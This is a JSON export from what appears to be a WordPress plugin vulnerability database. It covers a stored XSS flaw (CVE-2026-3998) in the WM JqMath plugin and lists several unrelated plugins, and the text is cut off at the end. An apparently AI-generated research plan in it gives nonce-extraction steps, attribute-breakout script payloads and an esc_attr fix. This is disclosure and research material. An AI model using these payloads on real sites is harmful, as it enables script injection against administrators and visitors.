[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fdtIFHck5gAqd7K6AN2MCiu4-6ZHOlK7Dsz4LskesMvQ":3,"$fIc0EwNM3kqk2aAs4w7cm0-L-WB143VvwM8u76qgZf08":217},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":14,"last_updated":15,"tested_up_to":16,"requires_at_least":17,"requires_php":18,"tags":19,"homepage":23,"download_link":24,"security_score":25,"vuln_count":14,"unpatched_count":14,"last_vuln_date":26,"fetched_at":27,"vulnerabilities":28,"developer":55,"crawl_stats":34,"alternatives":60,"analysis":165,"fingerprints":198},"wm-jqmath","WM JqMath","1.3","webmind.pt","https:\u002F\u002Fprofiles.wordpress.org\u002Fwebmindpt\u002F","\u003Cp>WM jqMath plugin is a very simple plugin that adds the jqMath library and styles.\u003C\u002Fp>\n\u003Cp>You will be able to add math formulas by directly entering the standard syntax of jqMath or by using a shortcode where you can also add CSS styles.\u003C\u002Fp>\n\u003Cp>Current WM jqMath features:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\n\u003Cp>Insert directly a jqMath expression on your post or page like: $$y={-b±√{b^2-4ac}}\u002F{2a}$$\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Insert a jqMath using a shortcode with CSS styles like: [jqmath expr=”$$y={-b±√{b^2-4ac}}\u002F{2a}$$” style=”color: navy; font-size: 20pt”]\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>In order to enable jqMath for your post, you need to add the shortcode [enable_jqmath] at the beginning of your post.\u003C\u002Fp>\n\u003Cp>The jqMath library was written by Dave Barton from Mathscribe. You can find further information regarding jqMath by clicking \u003Ca href=\"http:\u002F\u002Fwww.mathscribe.com\u002Fauthor\u002Fjqmath.html\" rel=\"nofollow ugc\">here\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>We want to thank Dave for developing this great library!\u003C\u002Fp>\n","Create math formulas on your posts and pages using jqMath from MathScribe",20,1884,100,1,"2015-08-05T01:49:00.000Z","4.2.39","3.3","",[20,21,22],"jqmath","webmind","wm","http:\u002F\u002Fwebmind.pt\u002Fportfolio\u002Fwm-jqmath\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwm-jqmath.1.3.zip",63,"2026-04-14 19:46:51","2026-04-06T09:54:40.288Z",[29],{"id":30,"url_slug":31,"title":32,"description":33,"plugin_slug":4,"theme_slug":34,"affected_versions":35,"patched_in_version":34,"severity":36,"cvss_score":37,"cvss_vector":38,"vuln_type":39,"published_date":26,"updated_date":40,"references":41,"days_to_patch":34,"patch_diff_files":43,"patch_trac_url":34,"research_status":44,"research_verified":45,"research_rounds_completed":46,"research_plan":47,"research_summary":48,"research_vulnerable_code":49,"research_fix_diff":50,"research_exploit_outline":51,"research_model_used":52,"research_started_at":53,"research_completed_at":54,"research_error":34,"poc_status":34,"poc_video_id":34,"poc_summary":34,"poc_steps":34,"poc_tested_at":34,"poc_wp_version":34,"poc_php_version":34,"poc_playwright_script":34,"poc_exploit_code":34,"poc_has_trace":45,"poc_model_used":34,"poc_verification_depth":34},"CVE-2026-3998","wm-jqmath-authenticated-contributor-stored-cross-site-scripting-via-style-shortcode-attribute","WM JqMath \u003C= 1.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'style' Shortcode Attribute","The WM JqMath plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'style' shortcode attribute of the [jqmath] shortcode in all versions up to and including 1.3. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes. The generate_jqMathFormula() function directly concatenates the 'style' attribute value into an HTML style attribute without applying esc_attr() or any other escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",null,"\u003C=1.3","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-15 08:28:16",[42],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb4aebb45-b47b-4b5a-8281-400a4b786689?source=api-prod",[],"researched",false,3,"## Vulnerability Analysis: CVE-2026-3998 - Stored XSS in WM JqMath\n\n### 1. Vulnerability Summary\nThe **WM JqMath** plugin (versions \u003C= 1.3) contains a stored cross-site scripting (XSS) vulnerability within the handling of its `[jqmath]` shortcode. Specifically, the function `generate_jqMathFormula()` processes attributes passed to the shortcode. The `style` attribute is accepted from user input and concatenated directly into an HTML `\u003Cspan>` or `\u003Cdiv>` tag's `style` attribute without being passed through `esc_attr()` or similar sanitization. This allows an authenticated user with at least \"Contributor\" privileges (who can create posts) to inject arbitrary HTML attributes or break out of the `style` attribute to inject `\u003Cscript>` tags.\n\n### 2. Attack Vector Analysis\n*   **Shortcode:** `[jqmath]`\n*   **Vulnerable Attribute:** `style`\n*   **Authentication Level:** Contributor or higher. Contributors can create and save posts but cannot publish them; however, the XSS will execute when an Administrator or Editor previews the post or if the post is published.\n*   **Payload Location:** The payload is embedded within the `style` attribute of the shortcode inside the post content.\n*   **Endpoint:** Standard WordPress post creation\u002Fediting (`\u002Fwp-admin\u002Fpost.php` or REST API `\u002Fwp\u002Fv2\u002Fposts`).\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers the shortcode in the main plugin file (likely `wm-jqmath.php`):\n    `add_shortcode('jqmath', 'generate_jqMathFormula');`\n2.  **Attribute Parsing:** When a post containing `[jqmath]` is rendered, WordPress calls `generate_jqMathFormula($atts, $content)`.\n3.  **Processing:** Inside `generate_jqMathFormula()`:\n    *   The `$atts` array is processed (possibly using `shortcode_atts`).\n    *   The value of `$atts['style']` is retrieved.\n4.  **Sink:** The value is concatenated into an HTML string:\n    `return '\u003Cspan style=\"' . $atts['style'] . '\">' . $formula_markup . '\u003C\u002Fspan>';` (inferred)\n5.  **Output:** The unescaped string is returned to the WordPress content filter and rendered in the browser.\n\n### 4. Nonce Acquisition Strategy\nTo exploit this as an authenticated Contributor via the web interface, the agent must obtain a valid post-editing nonce.\n\n1.  **Login:** Use the `http_request` tool to authenticate as a Contributor.\n2.  **Access Post Creator:** Navigate to `wp-admin\u002Fpost-new.php`.\n3.  **Extract Nonce:** Use `browser_eval` to extract the `_wpnonce` required for the `sample-permalink` or the primary post-saving action.\n    *   `_wpnonce` is typically found in the `#_wpnonce` input field.\n    *   Command: `browser_eval(\"document.querySelector('#_wpnonce').value\")`\n4.  **Alternative (REST API):** If the Block Editor is used, the agent can extract the REST nonce from the `wpApiSettings` object:\n    *   Command: `browser_eval(\"window.wpApiSettings?.nonce\")`\n\n### 5. Exploitation Strategy\nThe goal is to inject a `\u003Cscript>` tag by breaking out of the `style` attribute.\n\n**Step-by-step Plan:**\n\n1.  **Authentication:** Authenticate the agent as a user with the `contributor` role.\n2.  **Payload Construction:**\n    *   The target context is `\u003Cspan style=\"[USER_INPUT]\">`.\n    *   Payload: `\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n    *   Full Shortcode: `[jqmath style='\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>']test[\u002Fjqmath]`\n3.  **Post Creation:**\n    *   Use the `http_request` tool to send a POST request to `\u002Fwp-admin\u002Fpost.php`.\n    *   **Action:** `editpost`\n    *   **Parameters:**\n        *   `post_ID`: (The ID of a newly created draft)\n        *   `_wpnonce`: (Extracted in Step 4)\n        *   `content`: `[jqmath style='\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>']test[\u002Fjqmath]`\n        *   `post_title`: `XSS Test`\n4.  **Execution:** Navigate to the permalink of the draft post or use the \"Preview\" functionality.\n5.  **Confirmation:** Check the response body for the unescaped script tag.\n\n### 6. Test Data Setup\nBefore exploitation, ensure the environment is ready:\n1.  **Plugin Activation:** Verify `wm-jqmath` is installed and active.\n2.  **User Creation:** Create a contributor user:\n    `wp user create contributor_attacker attacker@example.com --role=contributor --user_pass=password123`\n3.  **Target Post:** Create a blank draft post for the contributor to edit:\n    `wp post create --post_type=post --post_status=draft --post_author=$(wp user get contributor_attacker --field=ID) --post_title=\"Draft\"`\n\n### 7. Expected Results\n*   **Injected Content:** When viewing the source of the rendered post, the output should look like:\n    `\u003Cspan style=\"\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">...\u003C\u002Fspan>`\n*   **Execution:** A browser navigating to the post should trigger the `alert(document.domain)` JavaScript.\n\n### 8. Verification Steps\n1.  **WP-CLI Verification:** After the HTTP request, verify the content is stored in the database:\n    `wp post get [POST_ID] --field=post_content`\n    Confirm it contains the payload exactly as sent.\n2.  **Frontend Check:** Use `browser_navigate` to the post's URL and check for the alert or the existence of the script tag in the DOM:\n    `browser_eval(\"document.querySelector('script').textContent.includes('alert')\")`\n\n### 9. Alternative Approaches\nIf breaking out of the `style` attribute with `\">` is blocked or fails due to specific quote handling:\n1.  **Attribute Injection:** Inject an `onmouseover` event if the `style` attribute value is placed inside a tag but not properly enclosed:\n    *   Payload: `x\" onmouseover=\"alert(1)`\n    *   Shortcode: `[jqmath style='x\" onmouseover=\"alert(1)']`\n2.  **CSS-Based XSS (Legacy Browsers):** If direct script injection is filtered but the style attribute is kept, attempt:\n    *   Payload: `background-image: url(\"javascript:alert(1)\")` (Note: This is rarely effective in modern browsers but confirms the lack of sanitization).\n3.  **Attribute Breakout (Single Quote):** If the plugin wraps the attribute in single quotes:\n    *   Payload: `';>\u003Cscript>alert(1)\u003C\u002Fscript>`","The WM JqMath plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'style' attribute in the [jqmath] shortcode. This occurs because the plugin fails to sanitize or escape the user-supplied 'style' attribute value before outputting it in an HTML tag, allowing Contributor-level users to inject arbitrary JavaScript.","\u002F\u002F wm-jqmath.php (inferred location based on research plan)\n\u002F\u002F Within the function generate_jqMathFormula($atts, $content)\n\nfunction generate_jqMathFormula($atts, $content) {\n    $atts = shortcode_atts( array(\n        'style' => '',\n        'display' => 'inline'\n    ), $atts );\n\n    \u002F\u002F ... processing formula content ...\n\n    if ($atts['display'] == 'block') {\n        return '\u003Cdiv style=\"' . $atts['style'] . '\">$$' . $content . '$$\u003C\u002Fdiv>';\n    } else {\n        return '\u003Cspan style=\"' . $atts['style'] . '\">$' . $content . '$\u003C\u002Fspan>';\n    }\n}","--- wm-jqmath.php\n+++ wm-jqmath.php\n@@ -10,9 +10,10 @@\n         'display' => 'inline'\n     ), $atts );\n \n+    $safe_style = esc_attr($atts['style']);\n     if ($atts['display'] == 'block') {\n-        return '\u003Cdiv style=\"' . $atts['style'] . '\">$$' . $content . '$$\u003C\u002Fdiv>';\n+        return '\u003Cdiv style=\"' . $safe_style . '\">$$' . $content . '$$\u003C\u002Fdiv>';\n     } else {\n-        return '\u003Cspan style=\"' . $atts['style'] . '\">$' . $content . '$\u003C\u002Fspan>';\n+        return '\u003Cspan style=\"' . $safe_style . '\">$' . $content . '$\u003C\u002Fspan>';\n     }\n }","The exploit requires an attacker to have at least Contributor-level privileges to create or edit posts. 1. The attacker logs into the WordPress dashboard and creates a new post or edits a draft. 2. In the post editor, the attacker inserts the [jqmath] shortcode with a malicious 'style' attribute payload designed to break out of the HTML attribute, such as: [jqmath style='\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>']formula[\u002Fjqmath]. 3. When the post is saved or previewed by an administrator or viewed by any visitor, the unescaped payload is rendered directly into the page source as \u003Cspan style=\"\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">...\u003C\u002Fspan>, causing the script to execute in the victim's browser.","gemini-3-flash-preview","2026-04-16 15:39:41","2026-04-16 15:40:02",{"slug":56,"display_name":7,"profile_url":8,"plugin_count":14,"total_installs":11,"avg_security_score":25,"avg_patch_time_days":57,"trust_score":58,"computed_at":59},"webmindpt",30,68,"2026-04-18T19:27:03.514Z",[61,86,105,126,146],{"slug":62,"name":63,"version":64,"author":65,"author_profile":66,"description":67,"short_description":68,"active_installs":69,"downloaded":70,"rating":71,"num_ratings":72,"last_updated":73,"tested_up_to":74,"requires_at_least":75,"requires_php":76,"tags":77,"homepage":18,"download_link":83,"security_score":13,"vuln_count":84,"unpatched_count":84,"last_vuln_date":34,"fetched_at":85},"woo-jtl-connector","JTL-Connector for WooCommerce","2.4.1","ntbyk","https:\u002F\u002Fprofiles.wordpress.org\u002Fntbyk\u002F","\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002Fk6xv8LsR15w?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Cp>With JTL-Connector for WooCommerce, you can connect your WooCommerce online shop with the\u003Cbr \u002F>\nfree JTL-Wawi ERP system by JTL-Software. The ERP system as well as the entire JTL product\u003Cbr \u002F>\nfamily are perfectly suited to the requirements of e-commerce and mail order businesses.\u003Cbr \u002F>\nThey help you to process more orders in a shorter time and offer a range of exciting functionalities.\u003C\u002Fp>\n\u003Cp>With JTL-Connector, you have access to the complete JTL product family. Use JTL-Connector to transfer\u003Cbr \u002F>\nthe data from your existing WooCommerce shop to our ERP system. From now on, you can manage your online\u003Cbr \u002F>\nshop and your entre business with JTL-Wawi and profit from an efficient process chain that comprises\u003Cbr \u002F>\neverything from purchase to shipping and returns.\u003C\u002Fp>\n\u003Cp>JTL-Wawi and JTL-Connector are out-of-the-box solutions that use a lot of the functions that your\u003Cbr \u002F>\nWooCommerce shops use, too. Further functions can be individually programmed and added using JTL-Connector.\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Fanbindung-shopsysteme\" rel=\"nofollow ugc\">Further information on JTL-Connector, a connector for third party shops\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Why use an ERP system?\u003C\u002Fh3>\n\u003Cp>The free JTL-Wawi ERP system allows you to manage your business centrally with a single software.\u003Cbr \u002F>\nTransfer data from existing applications quickly and connect with a variety of online shop systems.\u003C\u002Fp>\n\u003Cp>Synchronise item data, orders and stocks in a centralised ERP software. System discontinuities, which\u003Cbr \u002F>\nare common with other solutions, can be significantly reduced with a leading ERP system such as JTL-Wawi.\u003Cbr \u002F>\nThe software allows you to easily keep track of all your sales channels. You can also automate your\u003Cbr \u002F>\nprocesses and deal with complex tax issues.\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Fwarenwirtschaft\" rel=\"nofollow ugc\">Further information on the ERP system JTL-Wawi\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Fjtl-wawi-download\" rel=\"nofollow ugc\">Download JTL-Wawi for free\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>PROFIT FROM THE ENTIRE JTL PRODUCT FAMILY\u003C\u002Fh3>\n\u003Cp>If you wish to optimise other aspects of your work, you can always choose more products from our\u003Cbr \u002F>\nextensive portfolio—no matter whether you want to enhance efficiency in sales, in the warehouse or in shipping.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Control your online shop with JTL-Wawi\u003C\u002Fli>\n\u003Cli>Multichannel distribution: sell on Amazon and eBay with JTL-eazyAuction\u003C\u002Fli>\n\u003Cli>Efficiently handle shipments and returns with the free JTL-Packing Bench+\u003C\u002Fli>\n\u003Cli>Print shipping labels for your logistics providers with JTL-Shipping\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Fe-commerce-loesungen\" rel=\"nofollow ugc\">Overview of the JTL product family\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>Many sellers also use JTL-Connector to transfer their data to JTL-Wawi and test our\u003Cbr \u002F>\nproprietary online shop system \u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Fonline-shopsystem\" rel=\"nofollow ugc\">JTL-Shop\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch3>STARTING EASY WITH STANDARD VERSIONS\u003C\u002Fh3>\n\u003Cp>Sellers often use standard shop systems without personalised features, plug-ins and added functions.\u003Cbr \u002F>\nOut-of-the-box shops like these can be connected to JTL-Wawi with a few simple steps using JTL-Connector.\u003C\u002Fp>\n\u003Ch3>CONNECTING INDIVIDUAL PLUG-INS\u003C\u002Fh3>\n\u003Cp>You have made individual adjustments to your shop, e.g. the installation of plug-ins? In this case,\u003Cbr \u002F>\nJTL-Connector needs an individual configuration for each of the plug-ins. To facilitate this, JTL-Connector\u003Cbr \u002F>\nfeatures an integrated \u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Fanbindung-shopsysteme#plugin-system-fuer-individualisierte-onlineshops\" rel=\"nofollow ugc\">plug-in interface\u003C\u002Fa>,\u003Cbr \u002F>\nenabling the transfer of personalised data and functions to JTL-Wawi.\u003C\u002Fp>\n\u003Ch3>HOW IT WORKS\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Initial data synchronisation\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>In the course of the initial synchronisation, data such as items, categories, images and customer and\u003Cbr \u002F>\norder information is transferred from your shop to JTL-Wawi. If you want to use JTL-Wawi as the leading\u003Cbr \u002F>\nsystem, you can directly and exclusively manage your products and process your online shop orders in\u003Cbr \u002F>\nJTL-Wawi right after the initial synchronisation.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Individual data maintenance\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Many of the performance features that JTL-Wawi offers can also be used in your online shop via the\u003Cbr \u002F>\nJTL-Connector, provided your shop system also offers these functionalities. Some functionalities of\u003Cbr \u002F>\nyour online shops are not transferred by JTL-Connector by default. Those can be added individually via\u003Cbr \u002F>\nplug-ins or additional programming.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Continuous synchronisation\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>The data created or changed by you in JTL-Wawi is transferred to your shop via the\u003Cbr \u002F>\nonline shop synchronisation. Orders placed in your shop are directly forwarded to JTL-Wawi.\u003Cbr \u002F>\nYou can process all orders, including shipping and returns, in JTL-Wawi. The current order\u003Cbr \u002F>\nstatus is transferred to your shop via JTL-Connector. In this way, your customers are always\u003Cbr \u002F>\ninformed about the status of their orders.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Combined operation\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>You can also operate JTL-Connector and your shop in a combined mode. In this case, you define what\u003Cbr \u002F>\ndata is to be imported into JTL-Wawi or transferred to your online shop. You can specify, for example,\u003Cbr \u002F>\nthat JTL-Wawi only updates stocks for the shop and only imports orders. This means that you still maintain\u003Cbr \u002F>\nyour products in the back end of your online shop.\u003C\u002Fp>\n\u003Ch3>FUTURE-PROOF DEVELOPMENT\u003C\u002Fh3>\n\u003Cp>JTL-Software holds all the knowledge to ensure the future-proof development of the JTL connectors.\u003Cbr \u002F>\nThis know-how enables us to react quickly to changing requirements and to adapt JTL-Connector to\u003Cbr \u002F>\nevolving connected shop systems. This ensures trouble-free compatibility with future versions.\u003C\u002Fp>\n\u003Ch3>COMPLEMENTARY SOLUTIONS FROM THE JTL PRODUCT FAMILY\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Management of several online shops with \u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Fwarenwirtschaft\u002Ffunktionen\u002Fonlineshop-anbindung#mehrere-onlineshops-gleichzeitig-anbinden-via-multishop-modul\" rel=\"nofollow ugc\">MultiShop\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Shipping and returns with JTL-Packing \u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Fwarenwirtschaft\u002Fpackprozess-vereinfachen\" rel=\"nofollow ugc\">Bench+\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Automated processes with \u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Fwarenwirtschaft\u002Fprozessoptimierung\" rel=\"nofollow ugc\">JTL-Workflows\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Import and export with \u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Fwarenwirtschaft\u002Fimport-export\" rel=\"nofollow ugc\">JTL-Ameise\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Connection to Amazon and eBay with \u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Fmarktplatz-schnittstelle\" rel=\"nofollow ugc\">JTL-eazyAuction\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Printing shipping labels with \u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Fversand-schnittstelle\" rel=\"nofollow ugc\">JTL-Shipping\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Warehouse management with \u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Flagerverwaltung\" rel=\"nofollow ugc\">JTL-WMS\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>TECHNICAL INSTRUCTIONS AND VIDEO TUTORIALS\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fguide.jtl-software.de\u002FKategorie:JTL-Connector:WooCommerce\" rel=\"nofollow ugc\">Documentation regarding JTL-Connector for WooCommerce\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=8DEX2xHoqtM&index=11&list=PL44cp2iiTsTXfN18-sZgAKIiaD2wSI4xl\" rel=\"nofollow ugc\">Video tutorials on the JTL connectors\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n","Extend your shop software, trough this connector, with an full ERP with many features for marketplaces etc.",1000,138413,86,6,"2025-11-25T12:43:00.000Z","6.4.8","4.7","8.0",[78,79,80,81,82],"connector","erp","jtl","warenwirtschaft","wms","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoo-jtl-connector.2.4.1.zip",0,"2026-04-16T10:56:18.058Z",{"slug":87,"name":88,"version":89,"author":90,"author_profile":91,"description":92,"short_description":93,"active_installs":94,"downloaded":95,"rating":84,"num_ratings":84,"last_updated":96,"tested_up_to":97,"requires_at_least":98,"requires_php":18,"tags":99,"homepage":18,"download_link":103,"security_score":104,"vuln_count":84,"unpatched_count":84,"last_vuln_date":34,"fetched_at":85},"wpml-short-code-translator","WPML Shortcode Translator","1.0","CloverValleyApps","https:\u002F\u002Fprofiles.wordpress.org\u002Fclovervalleyapps\u002F","\u003Cp>WPML.org has an excellent plugin to make WordPress sites multilingual. As well as powerful tools to manage the translation and translators.\u003C\u002Fp>\n\u003Cp>Reusable Text Blocks makes centralizing reusable text quick and easy.\u003Cbr \u002F>\nhttps:\u002F\u002Fwordpress.org\u002Fplugins\u002Freusable-text-blocks\u002F\u003C\u002Fp>\n\u003Cp>WPML doesnâ€™t work Reusable Text Blocks and other similar type plugins, resulting in messy workarounds.\u003C\u002Fp>\n\u003Cp>The solution was suggested on this thread:\u003Cbr \u002F>\nhttp:\u002F\u002Fwpml.org\u002Fforums\u002Ftopic\u002Fconditional-language-shortcode\u002F\u003C\u002Fp>\n\u003Cp>And so WPML Shortcode Translator was created so you can use power of WPML anywhere. For example:\u003C\u002Fp>\n\u003Cp>[wpml_language language=”enâ€]Hello[\u002Fwpml_language] \u003Cbr \u002F>\n[wpml_language language=â€œjaâ€]ã“ã‚“ã«ã¡ã¯[\u002Fwpml_language]\u003C\u002Fp>\n\u003Cp>Enjoy.\u003C\u002Fp>\n","WPML.org plugin users now can use language detection shortcode anywhere, e.g. text blocks.",300,8892,"2014-12-20T16:19:00.000Z","4.1.0","3.0.1",[100,101,102],"shortcode-translator","smpl-shortcode","wmpl","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpml-short-code-translator.zip",85,{"slug":106,"name":107,"version":108,"author":109,"author_profile":110,"description":111,"short_description":112,"active_installs":113,"downloaded":114,"rating":84,"num_ratings":84,"last_updated":115,"tested_up_to":116,"requires_at_least":117,"requires_php":118,"tags":119,"homepage":122,"download_link":123,"security_score":124,"vuln_count":46,"unpatched_count":84,"last_vuln_date":125,"fetched_at":85},"viewmedica","ViewMedica 9","1.4.21","Swarm Interactive","https:\u002F\u002Fprofiles.wordpress.org\u002Fswarminteractive\u002F","\u003Cp>This plugin is to help embed the ViewMedica&reg; Patient Education system on your WordPress site. It will help prevent WYSIWYG editors from stripping out script and HTML code that is required by your ViewMedica embed. You can also generate a full patient education section on your site in seconds!\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Instantly Embed ViewMedica\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>The ViewMedica plugin for WordPress adds a button to the WYSIWG editor which allows you to instantly embed any video in your account. Simply click the button, select your video and press Embed.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Create a page with links to your ViewMedica content\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>Use the plugin’s Page Generator to instantly make a Web page that features all of your ViewMedica videos. You can choose to show your video links in list form, or with a thumbnail image and description.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Change ViewMedica player settings globally\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>The Global Options settings change the behavior of ViewMedica across your entire site. Set things like your player width, default language and other features.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Change player settings for a single embed\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>The Inline Options settings give you control of individual ViewMedica embeds on your site. For example, you may want to disable menu access on a page so your users only see one specific video. Checkout the Shortcode Generator to see the options available, or head to a post and use our inline tool.\u003C\u002Fp>\n\u003Ch3>Download\u003C\u002Fh3>\n\u003Cp>Download the latest release of the plugin at https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fviewmedica\u002F\u003C\u002Fp>\n","ViewMedica 9 for WordPress Instantly embed your ViewMedica On-Demand in to your website",200,12471,"2025-02-24T16:08:00.000Z","6.1.10","3.0.0","5.2.4",[120,121,106],"medical","videos","http:\u002F\u002Fviewmedica.com\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fviewmedica.1.4.21.zip",90,"2025-01-14 16:50:48",{"slug":127,"name":128,"version":129,"author":130,"author_profile":131,"description":132,"short_description":133,"active_installs":13,"downloaded":134,"rating":84,"num_ratings":84,"last_updated":135,"tested_up_to":136,"requires_at_least":137,"requires_php":18,"tags":138,"homepage":144,"download_link":145,"security_score":104,"vuln_count":84,"unpatched_count":84,"last_vuln_date":34,"fetched_at":85},"remove-links-and-scripts","Remove Links and Scripts","0.2.4","Sami Ahmed Siddiqui","https:\u002F\u002Fprofiles.wordpress.org\u002Fsasiddiqui\u002F","\u003Cp>This plugin can remove the links, scripts, styles and some other meta from the wordpress header as listed below:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>shortlink\u003C\u002Fli>\n\u003Cli>rsd_link\u003C\u002Fli>\n\u003Cli>wlwmanifest_link\u003C\u002Fli>\n\u003Cli>feed_links\u003C\u002Fli>\n\u003Cli>emoji_scripts\u003C\u002Fli>\n\u003Cli>wp_embed \u003C\u002Fli>\n\u003Cli>wp_json\u003C\u002Fli>\n\u003Cli>emoji_styles \u003C\u002Fli>\n\u003Cli>generator\u003C\u002Fli>\n\u003Cli>rel_link\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>All the above headers can be removed from this plugin. You can select them from the settings page.\u003C\u002Fp>\n\u003Ch4>Make sure to check the settings Page\u003C\u002Fh4>\n\u003Ch3>Thanks for the Support\u003C\u002Fh3>\n\u003Cp>The support from the users that love Remove Links and Scripts is huge. You can support Remove Links and Scripts future development and help to make it even better by donating or even giving a 5 star rating with a nice message to me 🙂\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwww.paypal.me\u002Fyasglobal\" rel=\"nofollow ugc\">Donate to Remove Links and Scripts\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Bug reports\u003C\u002Fh3>\n\u003Cp>Bug reports for Remove Links and Scripts are \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fyasglobal\u002Fremove-links-and-scripts\" rel=\"nofollow ugc\">welcomed on GitHub\u003C\u002Fa>. Please note GitHub is not a support forum, and issues that aren’t properly qualified as bugs will be closed.\u003C\u002Fp>\n","Remove unwanted links and scripts from wordpress header.",3787,"2018-01-26T06:53:00.000Z","4.9.29","3.5",[139,140,141,142,143],"emoji_scripts","feed_links","rsd_link","shortlink","wlwmanifest_link","https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fremove-links-and-scripts\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fremove-links-and-scripts.0.2.4.zip",{"slug":147,"name":148,"version":149,"author":150,"author_profile":151,"description":152,"short_description":153,"active_installs":124,"downloaded":154,"rating":84,"num_ratings":84,"last_updated":155,"tested_up_to":156,"requires_at_least":98,"requires_php":18,"tags":157,"homepage":163,"download_link":164,"security_score":104,"vuln_count":84,"unpatched_count":84,"last_vuln_date":34,"fetched_at":85},"clean-up-wp-head","Clean up wp_head","0.2.1","Fredrik Malmgren","https:\u002F\u002Fprofiles.wordpress.org\u002Ffredrikmalmgren\u002F","\u003Cp>With Clean up wp_head you can easily 